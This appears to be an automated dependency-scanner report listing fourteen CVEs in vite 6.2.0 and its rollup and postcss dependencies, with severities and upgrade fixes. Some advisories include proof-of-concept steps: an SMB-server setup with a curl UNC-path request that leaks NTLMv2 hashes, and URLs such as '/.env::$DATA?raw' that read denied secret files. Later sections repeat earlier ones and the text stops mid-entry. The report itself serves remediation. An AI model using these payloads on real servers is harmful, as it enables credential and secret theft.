Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Vulnerabilities
| Vulnerability |
Severity |
 CVSS |
Dependency |
Type |
Fixed in (vite version) |
Remediation Possible** |
| CVE-2026-27606 |
 Critical |
9.1 |
rollup-4.34.8.tgz |
Transitive |
N/A* |
❌ |
| CVE-2026-53632 |
 High |
8.3 |
vite-6.2.0.tgz |
Direct |
https://github.com/vitejs/vite.git - v8.0.16,https://github.com/vitejs/vite.git - v6.4.3,https://github.com/vitejs/launch-editor.git - v2.14.1,https://github.com/vitejs/vite.git - v7.3.5 |
✅ |
| CVE-2026-53571 |
High |
7.5 |
vite-6.2.0.tgz |
Direct |
https://github.com/vitejs/vite.git - v8.0.16,https://github.com/vitejs/vite.git - v7.3.5,https://github.com/vitejs/vite.git - v6.4.3 |
✅ |
| CVE-2026-39363 |
High |
7.5 |
vite-6.2.0.tgz |
Direct |
vite-plus - 0.1.16,https://github.com/vitejs/vite.git - v7.3.2,https://github.com/vitejs/vite.git - v6.4.2,https://github.com/vitejs/vite.git - v8.0.5 |
✅ |
| CVE-2025-62522 |
 Medium |
6.5 |
vite-6.2.0.tgz |
Direct |
vite - 7.0.8,vite - 5.4.21,vite - 7.1.11,vite - 6.4.1 |
❌ |
| CVE-2025-46565 |
Medium |
6.5 |
vite-6.2.0.tgz |
Direct |
6.2.7 |
✅ |
| CVE-2025-32395 |
Medium |
6.5 |
vite-6.2.0.tgz |
Direct |
6.2.6 |
✅ |
| CVE-2026-41305 |
Medium |
6.1 |
postcss-8.5.3.tgz |
Transitive |
6.2.1 |
✅ |
| CVE-2026-39365 |
Medium |
5.3 |
vite-6.2.0.tgz |
Direct |
6.4.2 |
✅ |
| CVE-2025-31486 |
Medium |
5.3 |
vite-6.2.0.tgz |
Direct |
6.2.5 |
✅ |
| CVE-2025-31125 |
Medium |
5.3 |
vite-6.2.0.tgz |
Direct |
6.2.4 |
✅ |
| CVE-2025-30208 |
Medium |
5.3 |
vite-6.2.0.tgz |
Direct |
6.2.3 |
✅ |
| CVE-2025-58752 |
Medium |
4.3 |
vite-6.2.0.tgz |
Direct |
6.3.6 |
✅ |
| CVE-2025-58751 |
Medium |
4.3 |
vite-6.2.0.tgz |
Direct |
6.3.6 |
✅ |
*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.
**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation
Details
CVE-2026-27606
Vulnerable Library - rollup-4.34.8.tgz
Next-generation ES module bundler
Library home page: https://registry.npmjs.org/rollup/-/rollup-4.34.8.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- vite-6.2.0.tgz (Root Library)
- ❌ rollup-4.34.8.tgz (Vulnerable Library)
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Rollup is a module bundler for JavaScript. Versions prior to 2.80.0, 3.30.0, and 4.59.0 of the Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences ("../") to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. Versions 2.80.0, 3.30.0, and 4.59.0 contain a patch for the issue.
Publish Date: 2026-02-25
URL: CVE-2026-27606
CVSS 3 Score Details (9.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Release Date: 2026-02-25
Fix Resolution: https://github.com/rollup/rollup.git - v2.80.0,https://github.com/rollup/rollup.git - v3.30.0,https://github.com/rollup/rollup.git - v4.59.0
CVE-2026-53632
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- ❌ vite-6.2.0.tgz (Vulnerable Library)
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Summary The "launch-editor" NPM package accesses arbitrary paths including Windows UNC paths. When a UNC path is opened, Windows automatically attempts NTLM authentication to the remote host, causing the user’s NTLMv2 password hash to be leaked to an attacker-controlled SMB server. This can result in credential compromise through offline hash cracking. Impact If the following conditions are met, an attacker can get the NTLMv2 password hash on the computer that is using the "launch-editor": - using Windows - NTLM is not disabled ("it is recommended to disable" (https://techcommunity.microsoft.com/blog/windows-itpro-blog/advancing-windows-security-disabling-ntlm-by-default/4489526), while it's still enabled by default) - the user accesses the attackers website that sends request to a middleware using "launch-editor" - the server that has the middleware using "launch-editor" is running - the attacker knows the URL for that server and the middleware This would be a problem if the user password is too simple that it can be identified through offline hash cracking, potentially leading to further compromise of developer accounts or internal systems. Details "launch-editor" accepts file paths without validating or restricting Windows UNC paths such as: \attacker-host\share On Windows systems, accessing a UNC path triggers an automatic NTLM authentication attempt to the remote SMB server. No user interaction or warning is required for this authentication attempt to occur. If an attacker controls the SMB server referenced by the UNC path the victim’s NTLMv2 hash is transmitted to the attacker. The attacker can then capture the hash and perform offline password cracking. Successful cracking reveals the victim’s cleartext password. The attacker could target a developer that uses a development server using "launch-editor" to develop code locally, send them a link and grab their NTLMv2 hash. PoC From the attacker side, we will setup an SMB server. I personally used "Impacket's smbserver.py" (https://github.com/fortra/impacket/blob/master/examples/smbserver.py), but you could use something like "Responder" (https://github.com/lgandx/Responder) for this as well. For keeping it simple, we will use "smbserver.py" here. First, let's create a directory to serve as an SMB share. mkdir /tmp/data echo "Hello world" > /tmp/data/test.txt Then, start the SMB server. $ sudo smbserver.py -smb2support -debug share /tmp/data Now, run any project that uses the launch-editor package. I have setup a simple "Hello world" project that uses Vite to do this. Then run the project locally ("vite"). Now last, we will open a browser window and navigate to the URL used by the launch-editor package to trigger the NTLM authentication. Or we can use "curl" to achieve the same. curl 'http://localhost:5173/__open-in-editor?file=%5c%5c127.0.0.1%5cshare%5ctest.txt' Note the IP address in the HTTP request, and make sure it connects to the IP address of the SMB server. Now we can look at the logs of "smbserver.py" and see the NTLMv2 hash coming in. 
Publish Date: 2026-06-15
URL: CVE-2026-53632
CVSS 3 Score Details (8.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: High
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Release Date: 2026-06-15
Fix Resolution: https://github.com/vitejs/vite.git - v8.0.16,https://github.com/vitejs/vite.git - v6.4.3,https://github.com/vitejs/launch-editor.git - v2.14.1,https://github.com/vitejs/vite.git - v7.3.5
⛑️ Automatic Remediation will be attempted for this issue.
CVE-2026-53571
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- ❌ vite-6.2.0.tgz (Vulnerable Library)
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Summary The contents of files that are specified by ""server.fs.deny"" (https://vite.dev/config/server-options#server-fs-deny) can be returned to the browser on Windows. Impact Only apps that match the following conditions are affected: - explicitly exposes the Vite dev server to the network (using "--host" or ""server.host" config option" (https://vitejs.dev/config/server-options.html#server-host)) - the sensitive file exists in the allowed directories specified by ""server.fs.allow"" (https://vite.dev/config/server-options#server-fs-allow) - either of: - the sensitive file exists in an NTFS volume - the dev server is running on Windows and the sensitive file exists in a volume that 8.3 short name generation is enabled (it is enabled by default on system volumes) Details Vite’s dev server denies direct access to sensitive files through "server.fs.deny", including entries such as ".env", ".env.", and ".{crt,pem}". However, on Windows, the deny logic does not correctly normalize NTFS ADS path forms before access checks are applied. Because of this, requests such as "/.env::$DATA?raw" are treated as allowed paths, while Windows resolves them to the original file's default data stream. Similar to that, Windows allows accessing a file using a different name with the 8.3 short name compatibility feature. Vite did not reject accessing files via them. PoC $ npm create vite@latest $ cd vite-project/ $ npm install $ npm run dev Access via browser at "http://localhost:5173/.env::$DATA?raw" 
Example expected result: - "/.env::$DATA?raw" returns the contents of ".env" - "/tls.pem::$DATA?raw" returns the contents of "tls.pem"
Publish Date: 2026-06-15
URL: CVE-2026-53571
CVSS 3 Score Details (7.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Release Date: 2026-06-15
Fix Resolution: https://github.com/vitejs/vite.git - v8.0.16,https://github.com/vitejs/vite.git - v7.3.5,https://github.com/vitejs/vite.git - v6.4.3
⛑️ Automatic Remediation will be attempted for this issue.
CVE-2026-39363
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- ❌ vite-6.2.0.tgz (Vulnerable Library)
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Vite is a frontend tooling framework for JavaScript. From 6.0.0 to before 6.4.2, 7.3.2, and 8.0.5, if it is possible to connect to the Vite dev server’s WebSocket without an Origin header, an attacker can invoke fetchModule via the custom WebSocket event vite:invoke and combine file://... with ?raw (or ?inline) to retrieve the contents of arbitrary files on the server as a JavaScript string (e.g., export default "..."). The access control enforced in the HTTP request path (such as server.fs.allow) is not applied to this WebSocket-based execution path. This vulnerability is fixed in 6.4.2, 7.3.2, and 8.0.5.
Publish Date: 2026-04-07
URL: CVE-2026-39363
CVSS 3 Score Details (7.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-p9ff-h696-f583
Release Date: 2026-04-07
Fix Resolution: vite-plus - 0.1.16,https://github.com/vitejs/vite.git - v7.3.2,https://github.com/vitejs/vite.git - v6.4.2,https://github.com/vitejs/vite.git - v8.0.5
⛑️ Automatic Remediation will be attempted for this issue.
CVE-2025-62522
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- ❌ vite-6.2.0.tgz (Vulnerable Library)
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Vite is a frontend tooling framework for JavaScript. In versions from 2.9.18 to before 3.0.0, 3.2.9 to before 4.0.0, 4.5.3 to before 5.0.0, 5.2.6 to before 5.4.21, 6.0.0 to before 6.4.1, 7.0.0 to before 7.0.8, and 7.1.0 to before 7.1.11, files denied by server.fs.deny were sent if the URL ended with \ when the dev server is running on Windows. Only apps explicitly exposing the Vite dev server to the network and running the dev server on Windows were affected. This issue has been patched in versions 5.4.21, 6.4.1, 7.0.8, and 7.1.11.
Publish Date: 2025-10-20
URL: CVE-2025-62522
CVSS 3 Score Details (6.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-93m4-6634-74q7
Release Date: 2025-10-20
Fix Resolution: vite - 7.0.8,vite - 5.4.21,vite - 7.1.11,vite - 6.4.1
CVE-2025-46565
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- ❌ vite-6.2.0.tgz (Vulnerable Library)
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Vite is a frontend tooling framework for javascript. Prior to versions 6.3.4, 6.2.7, 6.1.6, 5.4.19, and 4.5.14, the contents of files in the project root that are denied by a file matching pattern can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected. Only files that are under project root and are denied by a file matching pattern can be bypassed. "server.fs.deny" can contain patterns matching against files (by default it includes .env, .env.*, *.{crt,pem} as such patterns). These patterns were able to bypass for files under "root" by using a combination of slash and dot (/.). This issue has been patched in versions 6.3.4, 6.2.7, 6.1.6, 5.4.19, and 4.5.14.
Publish Date: 2025-05-01
URL: CVE-2025-46565
CVSS 3 Score Details (6.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-859w-5945-r5v3
Release Date: 2025-05-01
Fix Resolution: 6.2.7
⛑️ Automatic Remediation will be attempted for this issue.
CVE-2025-32395
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- ❌ vite-6.2.0.tgz (Vulnerable Library)
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Vite is a frontend tooling framework for javascript. Prior to 6.2.6, 6.1.5, 6.0.15, 5.4.18, and 4.5.13, the contents of arbitrary files can be returned to the browser if the dev server is running on Node or Bun. HTTP 1.1 spec (RFC 9112) does not allow # in request-target. Although an attacker can send such a request. For those requests with an invalid request-line (it includes request-target), the spec recommends to reject them with 400 or 301. The same can be said for HTTP 2. On Node and Bun, those requests are not rejected internally and is passed to the user land. For those requests, the value of http.IncomingMessage.url contains #. Vite assumed req.url won't contain # when checking server.fs.deny, allowing those kinds of requests to bypass the check. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) and running the Vite dev server on runtimes that are not Deno (e.g. Node, Bun) are affected. This vulnerability is fixed in 6.2.6, 6.1.5, 6.0.15, 5.4.18, and 4.5.13.
Publish Date: 2025-04-10
URL: CVE-2025-32395
CVSS 3 Score Details (6.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-356w-63v5-8wf4
Release Date: 2025-04-10
Fix Resolution: 6.2.6
⛑️ Automatic Remediation will be attempted for this issue.
CVE-2026-41305
Vulnerable Library - postcss-8.5.3.tgz
Tool for transforming styles with JS plugins
Library home page: https://registry.npmjs.org/postcss/-/postcss-8.5.3.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- vite-6.2.0.tgz (Root Library)
- ❌ postcss-8.5.3.tgz (Vulnerable Library)
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
PostCSS takes a CSS file and provides an API to analyze and modify its rules by transforming the rules into an Abstract Syntax Tree. Versions prior to 8.5.10 do not escape "</style>" sequences when stringifying CSS ASTs. When user-submitted CSS is parsed and re-stringified for embedding in HTML "<style>" tags, "</style>" in CSS values breaks out of the style context, enabling XSS. Version 8.5.10 fixes the issue.
Publish Date: 2026-04-24
URL: CVE-2026-41305
CVSS 3 Score Details (6.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: Low
- Integrity Impact: Low
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-qx2v-qp2m-jg93
Release Date: 2026-04-24
Fix Resolution (postcss): 8.5.10
Direct dependency fix Resolution (vite): 6.2.1
⛑️ Automatic Remediation will be attempted for this issue.
CVE-2026-39365
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- ❌ vite-6.2.0.tgz (Vulnerable Library)
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Vite is a frontend tooling framework for JavaScript. From 6.0.0 to before 6.4.2, 7.3.2, and 8.0.5, the dev server’s handling of .map requests for optimized dependencies resolves file paths and calls readFile without restricting ../ segments in the URL. As a result, it is possible to bypass the server.fs.strict allow list and retrieve .map files located outside the project root, provided they can be parsed as valid source map JSON. This vulnerability is fixed in 6.4.2, 7.3.2, and 8.0.5.
Publish Date: 2026-04-07
URL: CVE-2026-39365
CVSS 3 Score Details (5.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: Low
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-4w7w-66w2-5vf9
Release Date: 2026-04-07
Fix Resolution: 6.4.2
⛑️ Automatic Remediation will be attempted for this issue.
CVE-2025-31486
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- ❌ vite-6.2.0.tgz (Vulnerable Library)
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Vite is a frontend tooling framework for javascript. The contents of arbitrary files can be returned to the browser. By adding ?.svg with ?.wasm?init or with sec-fetch-dest: script header, the server.fs.deny restriction was able to bypass. This bypass is only possible if the file is smaller than build.assetsInlineLimit (default: 4kB) and when using Vite 6.0+. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected. This vulnerability is fixed in 4.5.12, 5.4.17, 6.0.14, 6.1.4, and 6.2.5.
Publish Date: 2025-04-03
URL: CVE-2025-31486
CVSS 3 Score Details (5.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: High
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-xcj6-pq6g-qj4x
Release Date: 2025-04-03
Fix Resolution: 6.2.5
⛑️ Automatic Remediation will be attempted for this issue.
CVE-2025-31125
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- ❌ vite-6.2.0.tgz (Vulnerable Library)
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Vite is a frontend tooling framework for javascript. Vite exposes content of non-allowed files using ?inline&import or ?raw?import. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected. This vulnerability is fixed in 6.2.4, 6.1.3, 6.0.13, 5.4.16, and 4.5.11.
Publish Date: 2025-03-31
URL: CVE-2025-31125
CVSS 3 Score Details (5.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: High
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-4r4m-qw57-chr8
Release Date: 2025-03-31
Fix Resolution: 6.2.4
⛑️ Automatic Remediation will be attempted for this issue.
CVE-2025-30208
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- ❌ vite-6.2.0.tgz (Vulnerable Library)
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. "@fs" denies access to files outside of Vite serving allow list. Adding "?raw??" or "?import&raw??" to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as "?" are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using "--host" or "server.host" config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.
Publish Date: 2025-03-24
URL: CVE-2025-30208
CVSS 3 Score Details (5.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: High
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Release Date: 2025-03-24
Fix Resolution: 6.2.3
⛑️ Automatic Remediation will be attempted for this issue.
CVE-2025-58752
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- ❌ vite-6.2.0.tgz (Vulnerable Library)
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Vite is a frontend tooling framework for JavaScript. Prior to versions 7.1.5, 7.0.7, 6.3.6, and 5.4.20, any HTML files on the machine were served regardless of the "server.fs" settings. Only apps that explicitly expose the Vite dev server to the network (using --host or server.host config option) and use "appType: 'spa'" (default) or "appType: 'mpa'" are affected. This vulnerability also affects the preview server. The preview server allowed HTML files not under the output directory to be served. Versions 7.1.5, 7.0.7, 6.3.6, and 5.4.20 fix the issue.
Publish Date: 2025-09-08
URL: CVE-2025-58752
CVSS 3 Score Details (4.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: Low
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-jqfw-vq24-v9c3
Release Date: 2025-09-08
Fix Resolution: 6.3.6
⛑️ Automatic Remediation will be attempted for this issue.
CVE-2025-58751
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- ❌ vite-6.2.0.tgz (Vulnerable Library)
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Vite is a frontend tooling framework for JavaScript. Prior to versions 7.1.5, 7.0.7, 6.3.6, and 5.4.20, files starting with the same name with the public directory were served bypassing the "server.fs" settings. Only apps that explicitly expose the Vite dev server to the network (using --host or "server.host" config option), use the public directory feature (enabled by default), and have a symlink in the public directory are affected. Versions 7.1.5, 7.0.7, 6.3.6, and 5.4.20 fix the issue.
Publish Date: 2025-09-08
URL: CVE-2025-58751
CVSS 3 Score Details (4.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: Low
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-g4jq-h2w9-997c
Release Date: 2025-09-08
Fix Resolution: 6.3.6
⛑️ Automatic Remediation will be attempted for this issue.
⛑️Automatic Remediation will be attempted for this issue.
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Vulnerabilities
*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.
**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation
Details
Vulnerable Library - rollup-4.34.8.tgz
Next-generation ES module bundler
Library home page: https://registry.npmjs.org/rollup/-/rollup-4.34.8.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Rollup is a module bundler for JavaScript. Versions prior to 2.80.0, 3.30.0, and 4.59.0 of the Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences ("../") to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. Versions 2.80.0, 3.30.0, and 4.59.0 contain a patch for the issue.
Publish Date: 2026-02-25
URL: CVE-2026-27606
CVSS 3 Score Details (9.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Release Date: 2026-02-25
Fix Resolution: https://github.com/rollup/rollup.git - v2.80.0,https://github.com/rollup/rollup.git - v3.30.0,https://github.com/rollup/rollup.git - v4.59.0
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Summary The "launch-editor" NPM package accesses arbitrary paths including Windows UNC paths. When a UNC path is opened, Windows automatically attempts NTLM authentication to the remote host, causing the user’s NTLMv2 password hash to be leaked to an attacker-controlled SMB server. This can result in credential compromise through offline hash cracking. Impact If the following conditions are met, an attacker can get the NTLMv2 password hash on the computer that is using the "launch-editor": - using Windows - NTLM is not disabled ("it is recommended to disable" (https://techcommunity.microsoft.com/blog/windows-itpro-blog/advancing-windows-security-disabling-ntlm-by-default/4489526), while it's still enabled by default) - the user accesses the attackers website that sends request to a middleware using "launch-editor" - the server that has the middleware using "launch-editor" is running - the attacker knows the URL for that server and the middleware This would be a problem if the user password is too simple that it can be identified through offline hash cracking, potentially leading to further compromise of developer accounts or internal systems. Details "launch-editor" accepts file paths without validating or restricting Windows UNC paths such as: \attacker-host\share On Windows systems, accessing a UNC path triggers an automatic NTLM authentication attempt to the remote SMB server. No user interaction or warning is required for this authentication attempt to occur. If an attacker controls the SMB server referenced by the UNC path the victim’s NTLMv2 hash is transmitted to the attacker. The attacker can then capture the hash and perform offline password cracking. Successful cracking reveals the victim’s cleartext password. The attacker could target a developer that uses a development server using "launch-editor" to develop code locally, send them a link and grab their NTLMv2 hash. PoC From the attacker side, we will setup an SMB server. I personally used "Impacket's smbserver.py" (https://github.com/fortra/impacket/blob/master/examples/smbserver.py), but you could use something like "Responder" (https://github.com/lgandx/Responder) for this as well. For keeping it simple, we will use "smbserver.py" here. First, let's create a directory to serve as an SMB share. mkdir /tmp/data echo "Hello world" > /tmp/data/test.txt Then, start the SMB server. $ sudo smbserver.py -smb2support -debug share /tmp/data Now, run any project that uses the launch-editor package. I have setup a simple "Hello world" project that uses Vite to do this. Then run the project locally ("vite"). Now last, we will open a browser window and navigate to the URL used by the launch-editor package to trigger the NTLM authentication. Or we can use "curl" to achieve the same. curl 'http://localhost:5173/__open-in-editor?file=%5c%5c127.0.0.1%5cshare%5ctest.txt' Note the IP address in the HTTP request, and make sure it connects to the IP address of the SMB server. Now we can look at the logs of "smbserver.py" and see the NTLMv2 hash coming in.
Publish Date: 2026-06-15
URL: CVE-2026-53632
CVSS 3 Score Details (8.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
